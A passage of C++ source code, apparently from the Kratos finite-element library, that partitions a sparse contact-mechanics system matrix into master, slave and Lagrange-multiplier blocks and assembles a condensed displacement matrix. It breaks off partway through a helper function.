///@name Protected Operations
///@{
/**
* @brief This function generates the subblocks of matrix A
* @details as A = ( KNN KNM KNSI KNSA 0 0 ) u
* ( KMN KMM KMSI KMSA -MI^T -MA^T ) u_master
* ( KSIN KSIM KSISI KSISA DII^T DIA^T ) u_slave_inactive
* ( KSAN KSAM KSASI KSASA DAI^T DAA^T ) u_slave_active
* ( 0 0 0 0 ALMI 0 ) LMInactive
* ( 0 KLMAM KLMASI KLMASA 0 KLMALMA ) LMActive
* We will call as A = ( KNN KNM KNSI KNSA 0 0 ) u
* ( KMN KMM KMSI KMSA KMLMI KMLMA ) u_master
* ( KSIN KSIM KSISI KSISA KSILMI KSILMA ) u_slave_inactive
* ( KSAN KSAM KSASI KSASA KSALMI KSALMA ) u_slave_active
* ( 0 0 0 0 KLMILMI 0 ) LMInactive
* ( 0 KLMAM KLMASI KLMASA 0 KLMALMA ) LMActive
* Subblocks are allocated or not depending on the value of "NeedAllocation"
* @param rA System matrix
* @param rX Solution vector. It is also the initial guess for iterative linear solvers.
* @param rB Right hand side vector.
*/
void FillBlockMatrices (
const bool NeedAllocation,
SparseMatrixType& rA,
VectorType& rX,
VectorType& rB
)
{
KRATOS_TRY
// Auxiliar sizes
const SizeType other_dof_size = mOtherIndices.size();
const SizeType master_size = mMasterIndices.size();
const SizeType slave_inactive_size = mSlaveInactiveIndices.size();
const SizeType slave_active_size = mSlaveActiveIndices.size();
const SizeType lm_active_size = mLMActiveIndices.size();
const SizeType lm_inactive_size = mLMInactiveIndices.size();
if (NeedAllocation)
AllocateBlocks();
// Get access to A data
const IndexType* index1 = rA.index1_data().begin();
const IndexType* index2 = rA.index2_data().begin();
const double* values = rA.value_data().begin();
// Allocate the auxiliar blocks (assembled below in CSR form)
SparseMatrixType KMLMA(master_size, lm_active_size); /// The master-active LM block (this is the big block of M)
SparseMatrixType KLMALMA(lm_active_size, lm_active_size); /// The active LM-active LM block
SparseMatrixType KSALMA(slave_active_size, lm_active_size); /// The active slave-active LM block (this is the big block of D, diagonal)
SparseMatrixType KLMILMI(lm_inactive_size, lm_inactive_size); /// The inactive LM- inactive LM block (diagonal)
IndexType* KMLMA_ptr = new IndexType[master_size + 1];
IndexType* mKSAN_ptr = new IndexType[slave_active_size + 1];
IndexType* mKSAM_ptr = new IndexType[slave_active_size + 1];
IndexType* mKSASI_ptr = new IndexType[slave_active_size + 1];
IndexType* mKSASA_ptr = new IndexType[slave_active_size + 1];
IndexType* KSALMA_ptr = new IndexType[slave_active_size + 1];
IndexType* KLMILMI_ptr = new IndexType[lm_inactive_size + 1];
IndexType* KLMALMA_ptr = new IndexType[lm_active_size + 1];
#pragma omp parallel for
for (int i = 0; i < static_cast<int>(master_size + 1); i++)
KMLMA_ptr[i] = 0;
#pragma omp parallel for
for (int i = 0; i < static_cast<int>(slave_active_size + 1); i++) {
mKSAN_ptr[i] = 0;
mKSAM_ptr[i] = 0;
mKSASI_ptr[i] = 0;
mKSASA_ptr[i] = 0;
KSALMA_ptr[i] = 0;
}
#pragma omp parallel for
for (int i = 0; i < static_cast<int>(lm_inactive_size + 1); i++)
KLMILMI_ptr[i] = 0;
#pragma omp parallel for
for (int i = 0; i < static_cast<int>(lm_active_size + 1); i++)
KLMALMA_ptr[i] = 0;
#pragma omp parallel
{
// We iterate over original matrix
#pragma omp for
for (int i=0; i<static_cast<int>(rA.size1()); i++) {
const IndexType row_begin = index1[i];
const IndexType row_end = index1[i+1];
const IndexType local_row_id = mGlobalToLocalIndexing[i];
IndexType KMLMA_cols = 0;
IndexType mKSAN_cols = 0;
IndexType mKSAM_cols = 0;
IndexType mKSASI_cols = 0;
IndexType mKSASA_cols = 0;
IndexType KSALMA_cols = 0;
IndexType KLMILMI_cols = 0;
IndexType KLMALMA_cols = 0;
if ( mWhichBlockType[i] == BlockType::MASTER) { // KMLMA
for (IndexType j=row_begin; j<row_end; j++) {
const IndexType col_index = index2[j];
if ( mWhichBlockType[col_index] == BlockType::LM_ACTIVE) { // KMLMA block
++KMLMA_cols;
}
}
KRATOS_DEBUG_ERROR_IF(local_row_id > master_size) << "MASTER:: Local row ID: " << local_row_id <<" is greater than the number of rows " << master_size << std::endl;
KMLMA_ptr[local_row_id + 1] = KMLMA_cols;
} else if ( mWhichBlockType[i] == BlockType::SLAVE_ACTIVE) { // either KSAN or KSAM or KSASI or KSASA or KSALMA
for (IndexType j=row_begin; j<row_end; j++) {
const IndexType col_index = index2[j];
if (mWhichBlockType[col_index] == BlockType::OTHER) { // KSAN block
++mKSAN_cols;
} else if (mWhichBlockType[col_index] == BlockType::MASTER) { // KSAM block
++mKSAM_cols;
} else if (mWhichBlockType[col_index] == BlockType::SLAVE_INACTIVE) { // KSASI block
++mKSASI_cols;
} else if (mWhichBlockType[col_index] == BlockType::SLAVE_ACTIVE) { // KSASA block
++mKSASA_cols;
} else if ( mWhichBlockType[col_index] == BlockType::LM_ACTIVE) { // KSALMA block (diagonal)
++KSALMA_cols;
}
}
KRATOS_DEBUG_ERROR_IF(local_row_id > slave_active_size) << "SLAVE_ACTIVE:: Local row ID: " << local_row_id <<" is greater than the number of rows " << slave_active_size << std::endl;
mKSAN_ptr[local_row_id + 1] = mKSAN_cols;
mKSAM_ptr[local_row_id + 1] = mKSAM_cols;
mKSASI_ptr[local_row_id + 1] = mKSASI_cols;
mKSASA_ptr[local_row_id + 1] = mKSASA_cols;
KSALMA_ptr[local_row_id + 1] = KSALMA_cols;
} else if ( mWhichBlockType[i] == BlockType::LM_INACTIVE) { // KLMILMI
for (IndexType j=row_begin; j<row_end; j++) {
const IndexType col_index = index2[j];
if (mWhichBlockType[col_index] == BlockType::LM_INACTIVE) { // KLMILMI block (diagonal)
++KLMILMI_cols;
}
}
KRATOS_DEBUG_ERROR_IF(local_row_id > lm_inactive_size) << "LM_INACTIVE:: Local row ID: " << local_row_id <<" is greater than the number of rows " << lm_inactive_size << std::endl;
KLMILMI_ptr[local_row_id + 1] = KLMILMI_cols;
} else if ( mWhichBlockType[i] == BlockType::LM_ACTIVE) { // KLMALMA
for (IndexType j=row_begin; j<row_end; j++) {
const IndexType col_index = index2[j];
if (mWhichBlockType[col_index] == BlockType::LM_ACTIVE) { // KLMALMA block
++KLMALMA_cols;
}
}
KRATOS_DEBUG_ERROR_IF(local_row_id > lm_active_size) << "LM_ACTIVE:: Local row ID: " << local_row_id <<" is greater than the number of rows " << lm_active_size << std::endl;
KLMALMA_ptr[local_row_id + 1] = KLMALMA_cols;
}
}
}
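// NOTE: this is the classic two-pass CSR assembly. The parallel pass above stored each
// local row's nonzero count in ptr[row + 1]; the std::partial_sum calls below turn those
// counts into row offsets (e.g. counts [0, 2, 1, 3] become offsets [0, 2, 3, 6]), so the
// second parallel pass further down fills the slots [ptr[i], ptr[i+1]) of each
// index/value array.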
// We initialize the blocks sparse matrix
std::partial_sum(KMLMA_ptr, KMLMA_ptr + master_size + 1, KMLMA_ptr);
const std::size_t KMLMA_nonzero_values = KMLMA_ptr[master_size];
IndexType* aux_index2_KMLMA= new IndexType[KMLMA_nonzero_values];
double* aux_val_KMLMA= new double[KMLMA_nonzero_values];
std::partial_sum(mKSAN_ptr, mKSAN_ptr + slave_active_size + 1, mKSAN_ptr);
const std::size_t mKSAN_nonzero_values = mKSAN_ptr[slave_active_size];
IndexType* aux_index2_mKSAN= new IndexType[mKSAN_nonzero_values];
double* aux_val_mKSAN= new double[mKSAN_nonzero_values];
std::partial_sum(mKSAM_ptr, mKSAM_ptr + slave_active_size + 1, mKSAM_ptr);
const std::size_t mKSAM_nonzero_values = mKSAM_ptr[slave_active_size];
IndexType* aux_index2_mKSAM= new IndexType[mKSAM_nonzero_values];
double* aux_val_mKSAM= new double[mKSAM_nonzero_values];
std::partial_sum(mKSASI_ptr, mKSASI_ptr + slave_active_size + 1, mKSASI_ptr);
const std::size_t mKSASI_nonzero_values = mKSASI_ptr[slave_active_size];
IndexType* aux_index2_mKSASI= new IndexType[mKSASI_nonzero_values];
double* aux_val_mKSASI= new double[mKSASI_nonzero_values];
std::partial_sum(mKSASA_ptr, mKSASA_ptr + slave_active_size + 1, mKSASA_ptr);
const std::size_t mKSASA_nonzero_values = mKSASA_ptr[slave_active_size];
IndexType* aux_index2_mKSASA= new IndexType[mKSASA_nonzero_values];
double* aux_val_mKSASA = new double[mKSASA_nonzero_values];
std::partial_sum(KSALMA_ptr, KSALMA_ptr + slave_active_size + 1, KSALMA_ptr);
const std::size_t KSALMA_nonzero_values = KSALMA_ptr[slave_active_size];
IndexType* aux_index2_KSALMA= new IndexType[KSALMA_nonzero_values];
double* aux_val_KSALMA = new double[KSALMA_nonzero_values];
std::partial_sum(KLMILMI_ptr, KLMILMI_ptr + lm_inactive_size + 1, KLMILMI_ptr);
const std::size_t KLMILMI_nonzero_values = KLMILMI_ptr[lm_inactive_size];
IndexType* aux_index2_KLMILMI= new IndexType[KLMILMI_nonzero_values];
double* aux_val_KLMILMI = new double[KLMILMI_nonzero_values];
std::partial_sum(KLMALMA_ptr, KLMALMA_ptr + lm_active_size + 1, KLMALMA_ptr);
const std::size_t KLMALMA_nonzero_values = KLMALMA_ptr[lm_active_size];
IndexType* aux_index2_KLMALMA = new IndexType[KLMALMA_nonzero_values];
double* aux_val_KLMALMA = new double[KLMALMA_nonzero_values];
#pragma omp parallel
{
// We iterate over original matrix
#pragma omp for
for (int i=0; i<static_cast<int>(rA.size1()); i++) {
const IndexType row_begin = index1[i];
const IndexType row_end = index1[i+1];
const IndexType local_row_id = mGlobalToLocalIndexing[i];
if ( mWhichBlockType[i] == BlockType::MASTER) { // KMLMA
IndexType KMLMA_row_beg = KMLMA_ptr[local_row_id];
IndexType KMLMA_row_end = KMLMA_row_beg;
for (IndexType j=row_begin; j<row_end; j++) {
const IndexType col_index = index2[j];
if ( mWhichBlockType[col_index] == BlockType::LM_ACTIVE) { // KMLMA block
const double value = values[j];
const IndexType local_col_id = mGlobalToLocalIndexing[col_index];
aux_index2_KMLMA[KMLMA_row_end] = local_col_id;
aux_val_KMLMA[KMLMA_row_end] = value;
++KMLMA_row_end;
}
}
} else if ( mWhichBlockType[i] == BlockType::SLAVE_ACTIVE) { // either KSAN or KSAM or KSASI or KSASA or KSALMA
IndexType mKSAN_row_beg = mKSAN_ptr[local_row_id];
IndexType mKSAN_row_end = mKSAN_row_beg;
IndexType mKSAM_row_beg = mKSAM_ptr[local_row_id];
IndexType mKSAM_row_end = mKSAM_row_beg;
IndexType mKSASI_row_beg = mKSASI_ptr[local_row_id];
IndexType mKSASI_row_end = mKSASI_row_beg;
IndexType mKSASA_row_beg = mKSASA_ptr[local_row_id];
IndexType mKSASA_row_end = mKSASA_row_beg;
IndexType KSALMA_row_beg = KSALMA_ptr[local_row_id];
IndexType KSALMA_row_end = KSALMA_row_beg;
for (IndexType j=row_begin; j<row_end; j++) {
const IndexType col_index = index2[j];
const double value = values[j];
const IndexType local_col_id = mGlobalToLocalIndexing[col_index];
if (mWhichBlockType[col_index] == BlockType::OTHER) { // KSAN block
aux_index2_mKSAN[mKSAN_row_end] = local_col_id;
aux_val_mKSAN[mKSAN_row_end] = value;
++mKSAN_row_end;
} else if (mWhichBlockType[col_index] == BlockType::MASTER) { // KSAM block
aux_index2_mKSAM[mKSAM_row_end] = local_col_id;
aux_val_mKSAM[mKSAM_row_end] = value;
++mKSAM_row_end;
} else if (mWhichBlockType[col_index] == BlockType::SLAVE_INACTIVE) { // KSASI block
aux_index2_mKSASI[mKSASI_row_end] = local_col_id;
aux_val_mKSASI[mKSASI_row_end] = value;
++mKSASI_row_end;
} else if (mWhichBlockType[col_index] == BlockType::SLAVE_ACTIVE) { // KSASA block
aux_index2_mKSASA[mKSASA_row_end] = local_col_id;
aux_val_mKSASA[mKSASA_row_end] = value;
++mKSASA_row_end;
} else if ( mWhichBlockType[col_index] == BlockType::LM_ACTIVE) { // KSALMA block (diagonal)
aux_index2_KSALMA[KSALMA_row_end] = local_col_id;
aux_val_KSALMA[KSALMA_row_end] = value;
++KSALMA_row_end;
}
}
} else if ( mWhichBlockType[i] == BlockType::LM_INACTIVE) { // KLMILMI
IndexType KLMILMI_row_beg = KLMILMI_ptr[local_row_id];
IndexType KLMILMI_row_end = KLMILMI_row_beg;
for (IndexType j=row_begin; j<row_end; j++) {
const IndexType col_index = index2[j];
if (mWhichBlockType[col_index] == BlockType::LM_INACTIVE) { // KLMILMI block (diagonal)
const double value = values[j];
const IndexType local_col_id = mGlobalToLocalIndexing[col_index];
aux_index2_KLMILMI[KLMILMI_row_end] = local_col_id;
aux_val_KLMILMI[KLMILMI_row_end] = value;
++KLMILMI_row_end;
}
}
} else if ( mWhichBlockType[i] == BlockType::LM_ACTIVE) { // KLMALMA
IndexType KLMALMA_row_beg = KLMALMA_ptr[local_row_id];
IndexType KLMALMA_row_end = KLMALMA_row_beg;
for (IndexType j=row_begin; j<row_end; j++) {
const IndexType col_index = index2[j];
if (mWhichBlockType[col_index] == BlockType::LM_ACTIVE) { // KLMALMA block
const double value = values[j];
const IndexType local_col_id = mGlobalToLocalIndexing[col_index];
aux_index2_KLMALMA[KLMALMA_row_end] = local_col_id;
aux_val_KLMALMA[KLMALMA_row_end] = value;
++KLMALMA_row_end;
}
}
}
}
}
CreateMatrix(KMLMA, master_size, lm_active_size, KMLMA_ptr, aux_index2_KMLMA, aux_val_KMLMA);
CreateMatrix(mKSAN, slave_active_size, other_dof_size, mKSAN_ptr, aux_index2_mKSAN, aux_val_mKSAN);
CreateMatrix(mKSAM, slave_active_size, master_size, mKSAM_ptr, aux_index2_mKSAM, aux_val_mKSAM);
CreateMatrix(mKSASI, slave_active_size, slave_inactive_size, mKSASI_ptr, aux_index2_mKSASI, aux_val_mKSASI);
CreateMatrix(mKSASA, slave_active_size, slave_active_size, mKSASA_ptr, aux_index2_mKSASA, aux_val_mKSASA);
CreateMatrix(KSALMA, slave_active_size, lm_active_size, KSALMA_ptr, aux_index2_KSALMA, aux_val_KSALMA);
CreateMatrix(KLMILMI, lm_inactive_size, lm_inactive_size, KLMILMI_ptr, aux_index2_KLMILMI, aux_val_KLMILMI);
CreateMatrix(KLMALMA, lm_active_size, lm_active_size, KLMALMA_ptr, aux_index2_KLMALMA, aux_val_KLMALMA);
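// NOTE: the m-prefixed blocks (mKSAN, mKSAM, mKSASI, mKSASA) are kept as members because
// they are reused later (e.g. in GetLMAPart), whereas KMLMA, KSALMA, KLMILMI and KLMALMA
// are only needed locally to build the condensed operators below.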
// We compute directly the inverse of the KSALMA matrix
// KSALMA is supposed to be a diagonal matrix (in fact this is the key point of the formulation)
// (NOTE: technically it is not a stiffness matrix, we just keep that name)
if (lm_active_size > 0) {
ComputeDiagonalByLumping(KSALMA, mKLMAModified, ZeroTolerance);
}
// We compute directly the inverse of the KLMILMI matrix
// KLMILMI is supposed to be a diagonal matrix (in fact this is the key point of the formulation)
// (NOTE: technically it is not a stiffness matrix, we just keep that name)
if (lm_inactive_size > 0) {
ComputeDiagonalByLumping(KLMILMI, mKLMIModified, ZeroTolerance);
}
// Compute the P and C operators
if (slave_active_size > 0) {
SparseMatrixMultiplicationUtility::MatrixMultiplication(KMLMA, mKLMAModified, mPOperator);
SparseMatrixMultiplicationUtility::MatrixMultiplication(KLMALMA, mKLMAModified, mCOperator);
}
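// As assembled above, mKLMAModified holds the inverted (lumped) diagonal of KSALMA, so
//   mPOperator = KMLMA   * KSALMA^-1
//   mCOperator = KLMALMA * KSALMA^-1
// are the operators used afterwards to condense the master and active slave contributions.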
// We proceed with the auxiliar products for the master blocks
SparseMatrixType master_auxKSAN(master_size, other_dof_size);
SparseMatrixType master_auxKSAM(master_size, master_size);
SparseMatrixType master_auxKSASI(master_size, slave_inactive_size);
SparseMatrixType master_auxKSASA(master_size, slave_active_size);
if (slave_active_size > 0) {
SparseMatrixMultiplicationUtility::MatrixMultiplication(mPOperator, mKSAN, master_auxKSAN);
SparseMatrixMultiplicationUtility::MatrixMultiplication(mPOperator, mKSAM, master_auxKSAM);
if (slave_inactive_size > 0)
SparseMatrixMultiplicationUtility::MatrixMultiplication(mPOperator, mKSASI, master_auxKSASI);
SparseMatrixMultiplicationUtility::MatrixMultiplication(mPOperator, mKSASA, master_auxKSASA);
}
// We proceed with the auxiliar products for the active slave blocks
SparseMatrixType aslave_auxKSAN(slave_active_size, other_dof_size);
SparseMatrixType aslave_auxKSAM(slave_active_size, master_size);
SparseMatrixType aslave_auxKSASI(slave_active_size, slave_inactive_size);
SparseMatrixType aslave_auxKSASA(slave_active_size, slave_active_size);
if (slave_active_size > 0) {
SparseMatrixMultiplicationUtility::MatrixMultiplication(mCOperator, mKSAN, aslave_auxKSAN);
SparseMatrixMultiplicationUtility::MatrixMultiplication(mCOperator, mKSAM, aslave_auxKSAM);
if (slave_inactive_size > 0)
SparseMatrixMultiplicationUtility::MatrixMultiplication(mCOperator, mKSASI, aslave_auxKSASI);
SparseMatrixMultiplicationUtility::MatrixMultiplication(mCOperator, mKSASA, aslave_auxKSASA);
}
// Auxiliar indexes
const SizeType other_dof_initial_index = 0;
const SizeType master_dof_initial_index = other_dof_size;
const SizeType slave_inactive_dof_initial_index = master_dof_initial_index + master_size;
const SizeType assembling_slave_dof_initial_index = slave_inactive_dof_initial_index + slave_inactive_size;
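// Hence the condensed displacement system is ordered as
//   [ other (N) | master (M) | inactive slave (SI) | active slave (SA) ]
// and the initial indexes above mark the first row/column of each block.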
// The auxiliar index structure
const SizeType nrows = mKDispModified.size1();
const SizeType ncols = mKDispModified.size2();
IndexType* K_disp_modified_ptr_aux1 = new IndexType[nrows + 1];
K_disp_modified_ptr_aux1[0] = 0;
#pragma omp parallel
{
#pragma omp for
for (int i=0; i<static_cast<int>(rA.size1()); i++) {
if ( mWhichBlockType[i] == BlockType::OTHER) { //either KNN or KNM or KNSI or KNSA
ComputeNonZeroColumnsDispDoFs( index1, index2, values, i, other_dof_initial_index, K_disp_modified_ptr_aux1);
} else if ( mWhichBlockType[i] == BlockType::MASTER) { //either KMN or KMM or KMSI or KMLM
ComputeNonZeroColumnsDispDoFs( index1, index2, values, i, master_dof_initial_index, K_disp_modified_ptr_aux1);
} else if ( mWhichBlockType[i] == BlockType::SLAVE_INACTIVE) { //either KSIN or KSIM or KSISI or KSISA
ComputeNonZeroColumnsDispDoFs( index1, index2, values, i, slave_inactive_dof_initial_index, K_disp_modified_ptr_aux1);
} else if ( mWhichBlockType[i] == BlockType::LM_ACTIVE) { //either KLMAM or KLMASI or KLMASA
ComputeNonZeroColumnsPartialDispDoFs( index1, index2, values, i, assembling_slave_dof_initial_index, K_disp_modified_ptr_aux1);
}
}
}
// We initialize the final sparse matrix
std::partial_sum(K_disp_modified_ptr_aux1, K_disp_modified_ptr_aux1 + nrows + 1, K_disp_modified_ptr_aux1);
const SizeType nonzero_values_aux1 = K_disp_modified_ptr_aux1[nrows];
IndexType* aux_index2_K_disp_modified_aux1 = new IndexType[nonzero_values_aux1];
double* aux_val_K_disp_modified_aux1 = new double[nonzero_values_aux1];
#pragma omp parallel
{
#pragma omp for
for (int i=0; i<static_cast<int>(rA.size1()); i++) {
if ( mWhichBlockType[i] == BlockType::OTHER) { //either KNN or KNM or KNSI or KNSA
ComputeAuxiliarValuesDispDoFs( index1, index2, values, i, other_dof_initial_index, K_disp_modified_ptr_aux1, aux_index2_K_disp_modified_aux1, aux_val_K_disp_modified_aux1);
} else if ( mWhichBlockType[i] == BlockType::MASTER) { //either KMN or KMM or KMSI or KMLM
ComputeAuxiliarValuesDispDoFs( index1, index2, values, i, master_dof_initial_index, K_disp_modified_ptr_aux1, aux_index2_K_disp_modified_aux1, aux_val_K_disp_modified_aux1);
} else if ( mWhichBlockType[i] == BlockType::SLAVE_INACTIVE) { //either KSIN or KSIM or KSISI or KSISA
ComputeAuxiliarValuesDispDoFs( index1, index2, values, i, slave_inactive_dof_initial_index, K_disp_modified_ptr_aux1, aux_index2_K_disp_modified_aux1, aux_val_K_disp_modified_aux1);
} else if ( mWhichBlockType[i] == BlockType::LM_ACTIVE) { //either KLMAM or KLMASI or KLMASA
ComputeAuxiliarValuesPartialDispDoFs( index1, index2, values, i, assembling_slave_dof_initial_index, K_disp_modified_ptr_aux1, aux_index2_K_disp_modified_aux1, aux_val_K_disp_modified_aux1);
}
}
}
// Create the first auxiliar matrix
CreateMatrix(mKDispModified, nrows, ncols, K_disp_modified_ptr_aux1, aux_index2_K_disp_modified_aux1, aux_val_K_disp_modified_aux1);
// Now we create the second matrix block to sum
IndexType* K_disp_modified_ptr_aux2 = new IndexType[nrows + 1];
#pragma omp parallel for
for (int i = 0; i < static_cast<int>(nrows + 1); i++)
K_disp_modified_ptr_aux2[i] = 0;
#pragma omp parallel
{
#pragma omp for
for (int i=0; i<static_cast<int>(master_size); i++) {
IndexType K_disp_modified_cols_aux2 = 0;
// Get access to master_auxKSAN data
if (master_auxKSAN.nnz() > 0 && other_dof_size > 0) {
SparseMatrixMultiplicationUtility::ComputeNonZeroBlocks(master_auxKSAN, i, K_disp_modified_cols_aux2);
}
// Get access to master_auxKSAM data
if (master_auxKSAM.nnz() > 0) {
SparseMatrixMultiplicationUtility::ComputeNonZeroBlocks(master_auxKSAM, i, K_disp_modified_cols_aux2);
}
// Get access to master_auxKSASI data
if (master_auxKSASI.nnz() > 0 && slave_inactive_size > 0) {
SparseMatrixMultiplicationUtility::ComputeNonZeroBlocks(master_auxKSASI, i, K_disp_modified_cols_aux2);
}
// Get access to master_auxKSASA data
if (master_auxKSASA.nnz() > 0 && slave_active_size > 0) {
SparseMatrixMultiplicationUtility::ComputeNonZeroBlocks(master_auxKSASA, i, K_disp_modified_cols_aux2);
}
K_disp_modified_ptr_aux2[master_dof_initial_index + i + 1] = K_disp_modified_cols_aux2;
}
#pragma omp for
for (int i=0; i<static_cast<int>(slave_active_size); i++) {
IndexType K_disp_modified_cols_aux2 = 0;
// Get access to aslave_auxKSAN data
if (aslave_auxKSAN.nnz() > 0 && other_dof_size > 0) {
SparseMatrixMultiplicationUtility::ComputeNonZeroBlocks(aslave_auxKSAN, i, K_disp_modified_cols_aux2);
}
// Get access to aslave_auxKSAM data
if (aslave_auxKSAM.nnz() > 0 && master_size > 0) {
SparseMatrixMultiplicationUtility::ComputeNonZeroBlocks(aslave_auxKSAM, i, K_disp_modified_cols_aux2);
}
// Get access to aslave_auxKSASI data
if (aslave_auxKSASI.nnz() > 0 && slave_inactive_size > 0) {
SparseMatrixMultiplicationUtility::ComputeNonZeroBlocks(aslave_auxKSASI, i, K_disp_modified_cols_aux2);
}
// Get access to aslave_auxKSASA data
if (aslave_auxKSASA.nnz() > 0) {
SparseMatrixMultiplicationUtility::ComputeNonZeroBlocks(aslave_auxKSASA, i, K_disp_modified_cols_aux2);
}
K_disp_modified_ptr_aux2[assembling_slave_dof_initial_index + i + 1] = K_disp_modified_cols_aux2;
}
}
// We initialize the final sparse matrix
std::partial_sum(K_disp_modified_ptr_aux2, K_disp_modified_ptr_aux2 + nrows + 1, K_disp_modified_ptr_aux2);
const SizeType nonzero_values_aux2 = K_disp_modified_ptr_aux2[nrows];
IndexType* aux_index2_K_disp_modified_aux2 = new IndexType[nonzero_values_aux2];
double* aux_val_K_disp_modified_aux2 = new double[nonzero_values_aux2];
#pragma omp parallel
{
#pragma omp for
for (int i=0; i<static_cast<int>(master_size); i++) {
const IndexType row_beg = K_disp_modified_ptr_aux2[master_dof_initial_index + i];
IndexType row_end = row_beg;
// Get access to master_auxKSAN data
if (master_auxKSAN.nnz() > 0 && other_dof_size > 0) {
SparseMatrixMultiplicationUtility::ComputeAuxiliarValuesBlocks(master_auxKSAN, aux_index2_K_disp_modified_aux2, aux_val_K_disp_modified_aux2, i, row_end, other_dof_initial_index);
}
// Get access to master_auxKSAM data
if (master_auxKSAM.nnz() > 0) {
SparseMatrixMultiplicationUtility::ComputeAuxiliarValuesBlocks(master_auxKSAM, aux_index2_K_disp_modified_aux2, aux_val_K_disp_modified_aux2, i, row_end, master_dof_initial_index);
}
// Get access to master_auxKSASI data
if (master_auxKSASI.nnz() > 0 && slave_inactive_size > 0) {
SparseMatrixMultiplicationUtility::ComputeAuxiliarValuesBlocks(master_auxKSASI, aux_index2_K_disp_modified_aux2, aux_val_K_disp_modified_aux2, i, row_end, slave_inactive_dof_initial_index);
}
// Get access to master_auxKSASA data
if (master_auxKSASA.nnz() > 0 && slave_active_size > 0) {
SparseMatrixMultiplicationUtility::ComputeAuxiliarValuesBlocks(master_auxKSASA, aux_index2_K_disp_modified_aux2, aux_val_K_disp_modified_aux2, i, row_end, assembling_slave_dof_initial_index);
}
}
#pragma omp for
for (int i=0; i<static_cast<int>(slave_active_size); i++) {
const IndexType row_beg = K_disp_modified_ptr_aux2[assembling_slave_dof_initial_index + i];
IndexType row_end = row_beg;
// Get access to aslave_auxKSAN data
if (aslave_auxKSAN.nnz() > 0 && other_dof_size > 0) {
SparseMatrixMultiplicationUtility::ComputeAuxiliarValuesBlocks(aslave_auxKSAN, aux_index2_K_disp_modified_aux2, aux_val_K_disp_modified_aux2, i, row_end, other_dof_initial_index);
}
// Get access to aslave_auxKSAM data
if (aslave_auxKSAM.nnz() > 0 && master_size > 0) {
SparseMatrixMultiplicationUtility::ComputeAuxiliarValuesBlocks(aslave_auxKSAM, aux_index2_K_disp_modified_aux2, aux_val_K_disp_modified_aux2, i, row_end, master_dof_initial_index);
}
// Get access to aslave_auxKSASI data
if (aslave_auxKSASI.nnz() > 0 && slave_inactive_size > 0) {
SparseMatrixMultiplicationUtility::ComputeAuxiliarValuesBlocks(aslave_auxKSASI, aux_index2_K_disp_modified_aux2, aux_val_K_disp_modified_aux2, i, row_end, slave_inactive_dof_initial_index);
}
// Get access to aslave_auxKSASA data
if (aslave_auxKSASA.nnz() > 0) {
SparseMatrixMultiplicationUtility::ComputeAuxiliarValuesBlocks(aslave_auxKSASA, aux_index2_K_disp_modified_aux2, aux_val_K_disp_modified_aux2, i, row_end, assembling_slave_dof_initial_index);
}
}
}
// Create the second auxiliar matrix
SparseMatrixType K_disp_modified_aux2(nrows, ncols);
CreateMatrix(K_disp_modified_aux2, nrows, ncols, K_disp_modified_ptr_aux2, aux_index2_K_disp_modified_aux2, aux_val_K_disp_modified_aux2);
// We subtract the second auxiliar matrix from the first (note the -1.0 factor)
SparseMatrixMultiplicationUtility::MatrixAdd<SparseMatrixType, SparseMatrixType>(mKDispModified, K_disp_modified_aux2, - 1.0);
// Finally we ensure that the matrix is structurally symmetric
EnsureStructuralSymmetryMatrix(mKDispModified);
#ifdef KRATOS_DEBUG
CheckMatrix(mKDispModified);
#endif
// // DEBUG
// LOG_MATRIX_PRETTY(rA)
// LOG_MATRIX_PRETTY(mKDispModified)
KRATOS_CATCH ("")
}
///@}
///@name Protected Access
///@{
///@}
///@name Protected Inquiry
///@{
///@}
///@name Protected LifeCycle
///@{
///@}
private:
///@name Static Member Variables
///@{
///@}
///@name Member Variables
///@{
LinearSolverPointerType mpSolverDispBlock; /// The pointer to the displacement linear solver
Flags mOptions; /// This stores the flags
IndexVectorType mMasterIndices; /// The vector storing the indices of the master nodes in contact
IndexVectorType mSlaveInactiveIndices; /// The vector storing the indices of the slave nodes in contact (Inactive)
IndexVectorType mSlaveActiveIndices; /// The vector storing the indices of the slave nodes in contact (Active)
IndexVectorType mLMInactiveIndices; /// The vector storing the indices of the LM (Inactive)
IndexVectorType mLMActiveIndices; /// The vector storing the indices of the LM (Active)
IndexVectorType mOtherIndices; /// The vector containing the indices for other DoF
IndexVectorType mGlobalToLocalIndexing; /// This vector stores the correspondence between the global dof index and its local index inside its block
BlockTypeVectorType mWhichBlockType; /// This vector stores the LM block belongings
SparseMatrixType mKDispModified; /// The modified displacement block
SparseMatrixType mKLMAModified; /// The modified active LM block (inverted diagonal)
SparseMatrixType mKLMIModified; /// The modified inactive LM block (inverted diagonal)
SparseMatrixType mKSAN; /// The slave active-displacement block
SparseMatrixType mKSAM; /// The active slave-master block
SparseMatrixType mKSASI; /// The active slave-inactive slave block
SparseMatrixType mKSASA; /// The active slave-active slave block
SparseMatrixType mPOperator; /// The operator used for the master blocks
SparseMatrixType mCOperator; /// The operator used for the active slave block
VectorType mResidualLMActive; /// The residual of the active lagrange multipliers
VectorType mResidualLMInactive; /// The residual of the inactive lagrange multipliers
VectorType mResidualDisp; /// The residual of the rest of displacements
VectorType mLMActive; /// The solution of the active Lagrange multipliers
VectorType mLMInactive; /// The solution of the inactive Lagrange multipliers
VectorType mDisp; /// The solution of the rest of displacements
IndexType mEchoLevel = 0; /// The echo level of the solver
IndexType mFileCreated = 0; /// The index used to identify the file created
///@}
///@name Private Operators
///@{
///@}
///@name Private Operations
///@{
/**
* @brief This method is meant to avoid code duplication when computing the nonzero terms of the Aux1 matrix
* @param Index1 The indexes of nonzero rows
* @param Index2 The indexes of nonzero columns
* @param Values The array containing the values of the matrix
* @param CurrentRow The current row computed
* @param InitialIndex The index corresponding to the current row in the global contribution
* @param Ptr The array storing the number of nonzero terms of each row
*/
inline void ComputeNonZeroColumnsDispDoFs(
const IndexType* Index1,
const IndexType* Index2,
const double* Values,
const int CurrentRow,
const IndexType InitialIndex,
IndexType* Ptr
)
{
const IndexType row_begin = Index1[CurrentRow];
const IndexType row_end = Index1[CurrentRow + 1];
IndexType cols = 0;
const IndexType local_row_id = mGlobalToLocalIndexing[CurrentRow] + InitialIndex;
for (IndexType j=row_begin; j<row_end; j++) {
const IndexType col_index = Index2[j];
if (mWhichBlockType[col_index] == BlockType::OTHER) {
++cols;
} else if (mWhichBlockType[col_index] == BlockType::MASTER) {
++cols;
} else if (mWhichBlockType[col_index] == BlockType::SLAVE_INACTIVE) {
++cols;
} else if (mWhichBlockType[col_index] == BlockType::SLAVE_ACTIVE) {
++cols;
}
}
